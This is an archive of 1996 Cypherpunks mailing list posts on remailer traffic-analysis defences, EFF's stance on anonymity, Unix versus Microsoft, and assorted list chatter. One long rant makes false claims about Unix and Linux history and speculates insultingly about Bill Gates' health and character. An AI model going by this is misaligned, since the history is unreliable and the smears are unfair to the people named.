From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hack5@juno.com (patrick b cummings)
Date: Wed, 4 Sep 1996 07:49:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960902.151101.3470.0.hack5@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


their is a new mailing list for all you hackers just email your name or
handle and e-mail address and youll be subscribed
send information to hack5@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Wed, 4 Sep 1996 07:35:20 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: PKS RFC Project
Message-ID: <199609032023.QAA01688@charon.gti.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

For anyone who is interested in contributing to our experimental RFC
for public key servers, I set up a little mailing list for discussion.

	pks-rfc@charon.gti.net

To subscribe, send a message to pks-rfc-request@charon.gti.net with
"subscribe" in the subject field.

mark

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMiyToBz4pZwIaHjdAQGxTQf+Pvz6tFzbncPkbj2QX6awMjVZiYcAknQx
/n6JWGFpImCs+/WZJOqesUMWUXA2/Iwg1un2djZ5n8xsQKvcRzHrKwo3C8ZV9ECn
KuDJe/y2ZeU5sOSvqyyDATUxSUstj4CwhTES5/OD2NcuIKkVPW/h4Gtoo5ZuPp3D
wWdHjsuZ2tAZACvICpNvq3wHu2bW4Skv4p/BQeJFfRtGst/blmHrprFjjnlIXIUs
yF2S60DilGjIkcAtljGbI0VgH3O8Ra2HM4pTx/bDh86YTx8SKuOiZ6KbJwZl81yt
uEwkhdKrfQkp5M3FgfS1k1sIWjIm3K5u1osIqcTrTem5a1eivXqx/w==
=EvkN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 4 Sep 1996 05:35:02 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Blissful? Ignorance (was SCO giving free licenses to UNIX OpenServer)
Message-ID: <199609031629.KAA02275@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
** Reply to note from Hallam-Baker <hallam@ai.mit.edu> 09/02/96  5:15pm   
-0400  
  
    --or another Hallum-Baker ignorant rant v. unix, bsd, etc. 
  
= Eric Murray wrote:  
= >   
= > Scottauge@aol.com writes:  
=   
= > > Read, Understand, and Delight... Microsoft maybe in trouble at   
last.  
= >   
= > I doubt it.  People don't use Microsoft products because  
= > of their quality or functionality.  
=   
= Errmm.. hate to disappoint but SCO UNIX started life as Xenix which  
= was written by Microsoft in the dark ages.   
=   
=   
        the **original** SCO product and versions up to   
    3.something **were** xenix --not written by MS, but simple 
    unix V7 which was capable of 64K program and 64K data and 
    would run on a 286. 
 
        MS had a substantial investment in SCO when the old man 
    was screwing things up (before the old man was forced out 
    for sexual harassment --his brother had long since raped  
    Convergent and was gated). 
 
        MS had made the V7 deal with Western Electric with Billy  
    thinking he had an exclusive on **the** way to go --better  
    than sliced bread; V7 was not commercially available --only to    
    universities because of a WE consent decree with the government.   
    Billy was in seventh heaven --sure he had the deal of a lifetime! 
 
        not so: Bell Labs shortly announced the breakup and  
    decided to commercially ship System III --it was available 
    in source code only, but the price was only about $25K in  
    the first go around, and you could produce binaries for 
    sublicensing for $250 or some such --it was not a great 
    price, but it was doable.  System III was not restricted to 
    64K plus 64K.   
 
        One of my major conract customers at the time was WE  
    --System V R2 was already available internally, including a  
    decent VAX port (unlike the really piss-poor V32 Berkeley  
    rewrote into BSD 4.2 --offering it back to Bell Labs for  
    free, which was spurned from the Ivory Tower at Murrey Hill...) 
 
        With the WE and AT&T breakup, and the multiple licensing  
    activity, Gates hit the roof --threw several well known major  
    temper tantrums, including at least one at WE/Labs that I am 
    directly aware of.  Gates vowed to bury UNIX in all flavours 
    and has had that intention ever since  --non-stop.   
 
        Billy-boy does not carry a grudge lightly --he not only 
    gets very mad and comes off the wall (or handle), but he has 
    every intention of getting even.  I've always figured Billy  
    suffers from Tourette's for his mannerisms, his  
    uncontrollable rage, &c. --just has not learned to manage it, 
    and figured his Daddy could solve it all --and now there is  
    an item of $10billion give or take a few --buys a lot of hate. 
 
        part of Billy's vindictive plan against AT&T involved 
    hiring Dave Cutler from DEC --Cutler was the self-styled 
    leader of the VMS team, also with a bad case of temper-tantrums 
 
        I saw dave literally shatter an impossible to break WE  
    500 series telephone simply by "hanging" it up....   (...time 
    to clear the decks!)  and that was for NT --great job!  Cutler 
    took the deal thinking he had a free hand --at Billy's place? 
    --naive. and Dave had to put up with the Windows legacy...   
    the crap that goes on inside NT is not all Cutler's direct fault. 
 
        and that is Billy Boy and the SCO club...  and death  
    lurking in the alley for unix --but I doubt he will be able  
    to kill it --there is just too large a crowd of  
    professionals who refuse to use MS --not just because the  
    product is crap, but because of Billy. 
  
  
= > > This is for single user home based UNIX systems.  
= >   
= > Single-user UNIX isn't all that useful.  
=   
        matter of opinion --works fine,  
 
        just like the big guys, on a workstation.  so it limits  
    you to one login  -???  runs full multi-tasking re-entrant  
    just like multi-user. somewhere along the line, you were  
    standing behind the door and forgot to listen when single  
    user limitations were defined. 
 
= Listen to the guys who built it. UNIX  
= is a program development environment.  
= 
        that's so ludicrous, it's funny.   you figure everyone  
    just sat around playing with themselves? 
 
	I wouldn't tell that to Thompson, Ritchie, Kerrigan and 
    friends...   unix was a **tool**. 
 
= In the early years it was  
= interesting because there was source available, that ceased to be  
= the case years ago.  
= 
        and AT&T source has always been available at some price. 
  
        BSD source from 4.2 through the current (and last) 4.4 is 
    freely available,  
 
        give Walnut Creek $29,00 and you have it all and pay the 
    shipping from  Free Software Foundation (GNU) and you have 
    all that too (most of which is on the freeBsd and Linux 
    CDROMs anyway. 
 
= Multi-user ain't much better. Listen to the guys who built it.   
 
        apparently you never figured out there was anything after 
    SCO's initial releases --they were junk as was their first  
    several passes at System III and V  -they tried to live with  
    their Xenix Heritage --including trying to make System III  
    run on a 286 --an abysmal product. 
 
        today SCO is shipping SysV R4+ --the last Labs and Unix  
    International version which also contains all BSD calls which 
    were added by SUN under contract --it's a good solid product. 
 
        however, despite years of kernal hacking for WE, I still  
    prefer straight BSD flavours.  Commercially, SUN leads that  
    pack, followed by DEC with Ultrix which is BSD by another  
    name...  HP is sort of System V R4+  Even IBM is Unix --they  
    just call it AIX and it is BSD based --also very solid and  
    thoroughly supported --you can not even get IBM heavy iron  
    without AIX --MVS &c. run as processes. 
 
        Ken Olsen, founder of DEC, called unix "snake oil."  
    DEC's VMS is good, but was originally a DCL platform.  
    security is excellent by comparison to early unix, but it is 
    not open (or was not, to be correct)  --and source is 
    virtually out of the question. 
 
        FYI, both unix and VMS are derived from Multix... 
 
        Today DEC ships Ultrix on everything, and VMS  
    basically only on the mainframes.  Ken Olsen was forced out  
    when the sales staff blew Ford Motor Co out of the water on  
    an immense deal, along with an even larger Fed contract  
    --essentially the salesmen refused to sell unix (required  
    in both bid specs) on the hardware....  DEC started sliding,  
    and Ken was "retired." 
  
= Today Linux probably represents the future of the UNIX family, it  
= allows people who want to hack at the OS level access to the sources  
= of a fully functioning OS. This allows people to add in new kernel  
= features, schedulers and other exotica without having to write a  
= whole new O/S.  
=  
        the only reasons NT will end up in big business is  
    a) politics, b) freebies, and c) intimidation. MIS staffs  
    will not choose it, MSNBC just canned NT 4.0 as worthless  
    junk. 
 
        Linux has a large base, but it is a warmed over version  
    of Bell System V --rewritten supposedly from scratch by a  
    husband/wife team (I might have believed it had it been the  
    husband/wife team of Peter Conklin who was also on the DEC  
    VMS gig from the gate  --I gave him his first job out of  
    Harvard in 1962  --arrogant, but 100%. 
  
= Just don't confuse it with "home computing", this is geek computing  
= and you better have a lot of interest in computing to use it.  
= 
        that's pure bullshit, again. 
         
        actually, FreeBSD is easier to handle than Linux and more 
    professionally supported --including ongoing active 
    development,  It qualifies as home computing in my book --you 
    take the CD, copy two disks out to kick it off, and say GO. 
 
        comes up in X windows... 
 
        geek code?  get off your MicroSlop mentality limitation. 
 
= Home  
= computing is the market for users who need a system that's simpler  
= than a VCR or they can't use it.  
= 
        that's total nonsense, your British class system is  
    showing its ignorant face again  -you are insulting what  
    little intelligence the American middle class does have... 
 
        unless you really wish to limit the users to TV  
    set-top boxes which can "surf" a few canned sites from  
    assholes-on-line, etc.   
 
        the children of the household will never settle for that! 
 
= At one time that meant Apple, today  
= it means Microsoft, it will never mean Linux - not unless someone  
= can make Linux much much simpler than it is at present and provide  
= decent WISIWIG tools such as editors etc. designed for use by aunt  
= Ethel.  
= 
        give me a break!  your igonance is showing --it's plain and  
    simple an MS advertising jugernaut! 
 
        both linux and freebsd have X built in --FreeBSD actually 
    goes directly to X at bootup --and there are plenty of 
    tools,editors, etc in X  --and freeBSD runs Linux binaries.  
    and there are a number of high grade packages which are fully 
    supported.   
 
        Secondly, SUN binaries for X86 are no more expensive than 
    MS is heading for with NT which they will use to "replace"  
    W95 (W95 was just another MicroSlop holding pattern). 
 
        just a simple fact: MicroSlop advertising buries 
    anything and everything.  and, if that does not work: 
 
        Intimidation is just another form of Communication 
 
    and Billy's real good at, witness the DOJ and FTC round 2  
    unfolding now. 
 
        apparently your schooling is limited to MS courses.... 
 
        MS is a pure virus on its own, if not the software, than  
    certainly the company. 
 
        why does MS have 85% of the desktop? --the power of money 
    and lies --and a loud noisy parade with a bandwagon, free 
    beer, and all that good stuff that goes with predatory market 
    practices. 
 
        fair competition?  why should MS be fair when its stated  
    goal is to take a fraction of **every** transaction on any  
    network.  Billy has no tolerance for the existence of  
    anything other than Billy's creations and control --total 
    control. 
 
        It does not matter if W95 crashes more often than 3.1 
    --upgrade it for more money!  Money is the name of the game  
    at MS, not decent product for a reasonable price. 
 
        Always has been, always will.... 


        --attila


--
Now, with a black jack mule you wish to harness, you walk up,
look him in the eye, and hit him with a 2X4 over the left eye.  
If he blinks, hit him over the right eye! He'll cooperate 
    --so will politicians.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 4 Sep 1996 08:09:50 +0800
To: chuck@nova-net.net>
Subject: Re: The Esther Dyson Flap
Message-ID: <2.2.32.19960903204031.008a7850@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:42 AM 9/3/96 -0700, Timothy C. May wrote:

>However, as I said, if the top spokesman at EFF gives indication of having
>views pretty much 180 degrees out of phase with our views, it's likely
>we'll speak up and oppose her (or him), and perhaps even suggest that other
>EFF board members look into the matter. "Free speech" is not even an issue.

Everyone please take a deep breath.  Slow down.  Reread Esther's comments.
Count to 10.  Notice that nowhere does she call for state action to outlaw
anonymity.  She explicitly predicted a place for anonymity in her CFP'95
talk (is it on the Net anywhere?).  We may disagree with her predictions of
the future scope of anonymity or with her concerns about the risks of the
practice but she has never called for State action.  She is discussing the
problems she perceives with it.  That's all.

Poor Esther, Forbes swatted her last week for her prediction that the Net
kills copyright and now some of us are swatting her for her prediction that
many of the future Net transactions will be non-anonymous.  She may be wrong
in this prediction but so what.

Remember she is from the soft left.  She is not a macho-flash radical
libertarian like many of us.  Save the 155 MM howitzers for the armed
opposition not for our allies.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Wed, 4 Sep 1996 11:06:27 +0800
To: cypherpunks@toad.com
Subject: Re: their is a new mailing list
Message-ID: <199609032335.QAA09136@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


> To:            cypherpunks@toad.com
> From:          hack5@juno.com (patrick b cummings)
> Date:          Tue, 03 Sep 1996 16:14:40 EDT

> their is a new mailing list for all you hackers just email your name or
> handle and e-mail address and youll be subscribed
> send information to hack5@juno.com
> 
> 

Am I missing something here?  Is this guy fucking crazy?

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Wed, 4 Sep 1996 10:41:04 +0800
Subject: Re: Voting Monarchist?
In-Reply-To: <a1yoTD5w165w@bwalk.dm.com>
Message-ID: <199609032341.QAA24172@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! > > Vote Monarchist
! > 
! > who is the candidate? LaRouche?
! 
! Harry Brone is a fucking statist.  If he weren't, he wouldn't be running
! for president.  Anyone who doesn't advocate killing all kings, presidents,
! and prime ministers is a fucking statist and should be beaten to a pulp
! with a rattan stick.

That's the problem with the Libertarians, they've got some sort of
hang up about beatings.  Must be some childhood difficulties.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johan Helsingius <julf@penet.fi>
Date: Wed, 4 Sep 1996 03:16:41 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Educating former anon.penet.fi users about other remailers
Message-ID: <1.5.4.32.19960903141834.0084bc34@pentu.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>If somebody were to put together a one-page note on other remailers,
>would it make sense to send it to all the penet.fi users?
>A canonical cypherpunks approach would be to just write one and
>send it to na000001@anon.penet.fi ..... na600000@anon.penet.fi,
>but I assume either my system or Julf's would decide it was spam
>and discard it (even if it were split up into 60,000 10-message chunks.)

Yes, that´s what would happen. And I fear what woudl happen, load-wise,
if I tried to send 700.000 messages. 

Might be a good idea to post it into the appropriate newsgroups, at least. 

        Julf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 4 Sep 1996 11:56:11 +0800
To: jonl@well.com (Jon Lebkowsky)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <2.2.16.19960903152037.58cfc590@mail.well.com>
Message-ID: <199609040019.RAA04643@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> Compromise is not necessarily a bad thing; without some give and take, we
> sorta run right over each other. OTOH, I do agree that a strong position is
> necessary at this juncture.

Certainly. EFF regularly compromises with our allies, e.g. on who will 
run a particular web page, what a campaign icon will look like, where an 
event will be held, etc.  We're just not in the habit of compromising on 
legislation, since we are not in a position to give or sell anything, 
particular the rights of the public and of individual citizens.


--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Wed, 4 Sep 1996 05:24:01 +0800
To: cypherpunks@toad.com
Subject: SRP (from the cutting-room floor)
Message-ID: <9609031622.AA26229@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




JAM> Rather than divert messages, then, I propose that for each input
JAM> message there is a 10% chance that a piece of cover traffic is
JAM> generated.

AB> The way that this kind of attack is frustrated is that dummy messages
AB> are created as cover traffic by the remailer, and that at some points
AB> messages can be swallowed by a remailer as junk messages.

Automatic decoy traffic was in my draft, but was not in the slimmed-down
document I posted to CP.  This was mainly because Lance Cottrell and I
agreed on that bit, and thought it could be passed over.  Unlike JAM,
I was in favour of decoy traffic being _inversely_ related to genuine traffic.



AB> You can still do a spamming attack by recognizing the destination,
AB> rather than the message:

Diversion was intended to make that harder too.  Eve's messages won't all
go straight where she wants them.  They should turn up after some of them
completed the diversion, but I suggested that would  sometimes be too late
to track it further through the chain.


As for "messages can be swallowed by a remailer as junk messages", there's a
catch for the unwary in that.  See below.



TCM> Note that merely fiddling around with probabilities of transmission, such
TCM> as described above, will not be enough. This just adds a layer of noise,
TCM> which will disappear under a correlation analysis.

Kelsey wrote on 28th June about correlating messages at the points of
entry & exit from the remailer network.  I don't know what an attacker
gains by correlating _inside_ the net.


Here are the bits I omitted before.






DECOY MESSAGES

The sending of decoy messages by users is recommended, and serves to
hide statistical correlations between your sending a message and
somebody receiving one.  This practice should continue.  It is also
desirable that a remailer be able to originate decoy messages
itself.

Advantages include better traffic load following.  The remailer knows
when traffic is light and can generate more decoys.  This could be
important at times of low traffic such as public holidays.  It would
be especially important during a denial-of-service attack.  When an
attacker prevents messages from reaching the remailer (in the hope of
isolating a small number of target messages) a locally-produced set
of decoys, immune from the denial-of-service, could be crucial.

     DESTINATION
     
     Addressing all automatic decoys ultimately to "nobody" would
     ensure that they circulate in the network and then disappear.
     Nonconservation of message number should prove annoying to an
     eavesdropper.  (An implementation detail on this will be
     mentioned later.)

     Addressing some of them outside the network, to test newsgroups
     for instance might also be useful - confusing an attacker
     looking at the point of exit.

     NUMBER

     A possible means of matching the traffic would be to use an
     exponential- along the lines of those in thermodynamics.

               decoys = max  ( D.exp(-kT)  , E  )

     The "max" operator here ensures that every time a batch of
     messages is sent a minimum number of decoys will be included.
     Values for the constants can doubtless be suggested by remailer
     operators familiar with the traffic load.





.....





SILENT SPAMMING

Re-encryption as discussed here will not do any good if
remailers allow "silent spamming".  To exploit this feature
the attacker addresses his messages to "nobody" (or "null"
in Mixmaster jargon).  These mails fill the message pool,
sweeping out all the target messages, but when they come to
be sent they disappear.  They do not show on the net, they
do not need to be recognised and eliminated from the
search.  All the attacker sees leaving the spammed host is
undiluted target mail.

Obviously the remailer should detect messages of this type and
process them without storing them in the message pool.  Any message
that will not be delivered to a remote host comes into this
category, including those to most local accounts.

I briefly examined the source of 2.0.3
(from ftp://utopia.hacktic.nl/pub/replay/pub/remailer on 11 July 1996)
and could not find code to deal with this attack.



[Cottrell tells me this is on the to-do list.]



 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 4 Sep 1996 09:10:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [Noise] Hardware encryption devices?
Message-ID: <199609032223.RAA03063@homeport.org>
MIME-Version: 1.0
Content-Type: text


Anyone used any LAN encryption devices (ethernet or fast ethernet
speed?)  Something that could do IP AH off the back of an Ultrasparc
would be ideal.  Proprietary packet formats are ok, if they tunnel in
IP.  Needs to use DES, IDEA, or some other well known cipher.  Manual
key exchange is ok for this app.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 4 Sep 1996 13:10:31 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
In-Reply-To: <ae51b3f204021004e39e@[207.167.93.63]>
Message-ID: <199609032225.RAA07933@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat,"  wrote:
> >::
> >Request-Remailing-To: remailer@huge.cajones.com
> >::
> >Request-Remailing-To: remailer@remailer.nl.com
> ....
> >::
> >Request-Remailing-To: furballs@netcom.com (Paul S. Penrod)
> >Deep Throat.
> 
> 
> Hey, Hans, ya gotta watch those "Cc: cypherpunks@toad.com" lines!
> At least now we know who the _other_ "Unicorn" is.

Which brings up the following question: what is the role of human 
screwups in cryptosecurity? How "foolproof" (no pun intended) should
be remailer clients? How can we prevent people from forgetting to delete 
unencrypted files after encryption?

Alternatively, let's think about this: premail always fingers
a certain user account at berkeley.edu to obtain remailer keys.

Suppose that Joe DrugUser uses remailers to talk to his
Columbian friends and the government wants to find out what he is doing.
They could just break into the computer at berkeley.edu and replace keys
with the government-provided keys. They could even modify the finger
server so that it would be lying only to Joe's computer and would
work just as before for all others (to prevent detection).

The government would then intercept Joe's communications and
decrypt them.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Sep 1996 10:59:22 +0800
To: cypherpunks@toad.com
Subject: Re: The Esther Dyson Flap
In-Reply-To: <199609031719.KAA03089@mail.pacifier.com>
Message-ID: <R98oTD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> At 08:11 PM 9/2/96 -0700, Timothy C. May wrote:
> >Esther Dyson says that anonymity on the Net can do more damage than
> >anonymity in other forums, and thus may need to be regulated and restricted
> >in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's
> >term) has grown up with anonymity, and few people take the anonymous (or
> >not) rants and charges made in the millions per day with the same degree of
> >certainty they take print comments. Put another way, there is no clear and
> >present danger.
> 
> Indeed, I support the elimination of concepts such as "slander" and "libel" 
> precisely because they cause more harm than good.  Currently, there is an 
> illusion among ordinary citizens that "if that was untrue, you could sue him 
> for libel!" despite the fact that this is rarely practical.  In that way, 
> the law actually adds credibility to what should be an incredible claim.  
> Eliminate libel suits, and you've eliminated any presumption that because 
> it's been spoken or is in print, it's likely to be correct.

The gubment has no right to fuck with any speech - (seditius) libel, child
porn, bomb-making instructions... 

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 4 Sep 1996 14:05:55 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609032113.OAA06380@dns2.noc.best.net>
Message-ID: <199609040043.RAA05468@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald typed:
> 
> At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote:
> > EFF in generally does not issue extremist position 
> > statements, but is careful to examine the risks as well as the benefits, 
> > and look for pro-liberty solutions to those risks. 
> 
> If the right to speak anonymously is an "extremist" position in the eyes
> of the EFF, then they are no friends of liberty.

Recognition of the right to anything without recognition of the ethics 
that need to be observed in excerising that right, is an extremist 
position just as much as is a demand people give up liberty so that 
"responsibility" can be enforced. It's probably far less dangerous in 
most cases, but it's still rather indefensible.  That's all.  We 
certainly do NOT advocate what you may be misinterpreting as our 
position: that rights should or must be taken away when people behave 
unethically, or due to the fear that people will behave unethically. 
That's precisely the opposite of our opinion on everything we have an 
opinion on.  We hold that liberty must be preserved *in spite of* 
inevitable abuses.  But we also hold that it's important to know the 
ethics that come with rights, to adhere to them, to educate other people 
about them. Otherwise the rights aren't worth much.  What is the value of 
free speech if every message you receive is a threat, defamation, spam, 
or private information stolen from someone else? (to give a fairly 
extreme example).

> It is the overwhelmingly mainstream position, not just among netizens,
> but when last heard, amongst supreme court judges and ordinary people
> in the street.

I believe we are talking about precisely the same position, just in 
different terms.  Let's not argue. :)

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Quinby <jquinby@fivepaces.com>
Date: Wed, 4 Sep 1996 10:34:26 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] The Doors
Message-ID: <2.2.32.19960903214956.007154d4@mailhost>
MIME-Version: 1.0
Content-Type: text/plain


At 07:36 PM 9/3/96 +0000, you wrote:
>
>The Doors was not only about freedom and love, but about crypto too!
>Notice these lines from the song "Five to One"
>
>Old [cipher] gets old and young get stronger
>May take a week baby, may take longer [to crack]

Actually, I think the line reads "They take our week, and make it longer."
(There's a line a little later that goes "Trading your hours for a handful
of dimes.")

>they've [clinton] got the guns and we've got the numbers
>gonna win we will take 'em over, com'on.

Slightly left of topic, but it is a great song! :)

Someone ought to compile a "Best of Crypto-references in pop culture" file.
|--------------------------------------------------------------------------|
|James R. Quinby, Atlanta, GA |  PADI/153KHz-999MHz/HTML/EADBGE/Phl4:8-13  |
|jquinby@fivepaces.com (work) |     Own a 45 MPH couch potato: Adopt a     |
|jquinby@bellsouth.net (home) |     greyhound today. Write for details.    |
|--------------------------------------------------------------------------|
|Standard disclaimer: Opinions expressed are mine alone, not my employers. |
|PGP Public Key fingerprint: 9ACC4C28478018E1372DC06A9452A477/MIT Keyserver|
|--------------------------------------------------------------------------|







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Medea <myth@nym.alias.net>
Date: Wed, 4 Sep 1996 10:04:31 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] The Doors
Message-ID: <199609032152.RAA26814@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Vipul wrote:
>
>The Doors was not only about freedom and love, but about crypto too!
>Notice these lines from the song "Five to One"
>
>Old [cipher] gets old and young get stronger
>May take a week baby, may take longer [to crack]
>they've [clinton] got the guns and we've got the numbers
>gonna win we will take 'em over, com'on.

What?!  I think you need to stop ingesting those controlled substances....


Medea

========================================
I wonder whatever happened to Jason....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 4 Sep 1996 11:41:40 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609031737.KAA20451@netcom2.netcom.com>
Message-ID: <Pine.SUN.3.91.960903175520.783A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


V.Z. Nuri, please watch your attributions. I don't recall making any 
claims about "ghettoization" of anonymity.

-Declan


On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote:
> what cpunks might consider doing is creating an alternative message
> distribution system like Usenet that starts from the premise that
> anonymous communication is allowed and trying to grow it.
> 
> btw, McCullagh's and other's claims about "ghettoization" of 
> anonymity strike me as very specious. as long as people can use
> anonymity in some forum they want, I think that's acceptable. what's
> the equivalent of a "ghetto" in cyberspace? you can't go into
> a meeting of professionals wearing a ski mask, although you might
> be able to create such a forum yourself. does that mean you are
> in some kind of a "ghetto"?  oh, brother.


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 4 Sep 1996 11:54:31 +0800
To: Jon Lebkowsky <mech@eff.org>
Subject: Re: What is the EFF doing exactly?
Message-ID: <199609040057.RAA01205@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
>At 01:22 AM 9/3/96 -0700, James A. Donald wrote:
>>At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote:
>>> EFF in generally does not issue extremist position 
>>> statements, but is careful to examine the risks as well as the benefits, 
>>> and look for pro-liberty solutions to those risks. 
>>
>>If the right to speak anonymously is an "extremist" position in the eyes
>>of the EFF, then they are no friends of liberty.
>>
>>It is hardly an "extremist" position outside of such countries as Cuba,
>>Iran, or China.
>>
>>It is the overwhelmingly mainstream position, not just among netizens,
>>but when last heard, amongst supreme court judges and ordinary people
>>in the street.
>
>Not necessarily. The character of the anonymous speech is decisive. If you
>use anonymity to cloak harassment, for instance, the anonymity (which
>removes accountability) is a problem.  The accountability issue is real and
>should be addressed, not evaded.

"Addressed", maybe, but that doesn't necessarily mean, "solved."  For many 
decades, people have been able to walk up to a pay telephone at 3:00 AM and 
make a harassing phone call to somebody, a "problem" which still exists and 
no solution is being implemented for.

I think it's reasonable to come to the conclusion that there is no solution 
to the anonymity "problem" that isn't worse than the underlying anonymity.  
And, BTW, I don't consider a pro-anonymity position to be an extremist one.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Wed, 4 Sep 1996 11:45:09 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609040057.RAA01205@mail.pacifier.com>
Message-ID: <199609040104.SAA06261@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> >The accountability issue is real and
> >should be addressed, not evaded.
> 
> "Addressed", maybe, but that doesn't necessarily mean, "solved."  For many 
> decades, people have been able to walk up to a pay telephone at 3:00 AM and 
> make a harassing phone call to somebody, a "problem" which still exists and 
> no solution is being implemented for.

Yes! Exactly! Of course!  Precisely the example that has come up in EFF's 
own statements on anonymity (which, in absence of a policy on the topic 
have been strictly factual, reporting both sides of the issue).

> I think it's reasonable to come to the conclusion that there is no solution 
> to the anonymity "problem" that isn't worse than the underlying anonymity.  

That's a common view here, to say the least.  And it's one with which I 
am in 100% agreement.

> And, BTW, I don't consider a pro-anonymity position to be an extremist one.

We don't either, even those of us with questions and conundrums to think 
about.

I do think its extremist to not be willing to even address the questions 
and conundrums, but we're in agrement on that, so not much to argue about,
fortunately.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddfr@best.com (david friedman)
Date: Wed, 4 Sep 1996 12:03:26 +0800
To: cypherpunks@toad.com
Subject: Re: Schelling Points, Rights, and Game Theory--My article
Message-ID: <v02130504ae51c5b7a1d1@[205.149.171.135]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May mentioned my article on this subject. It is:
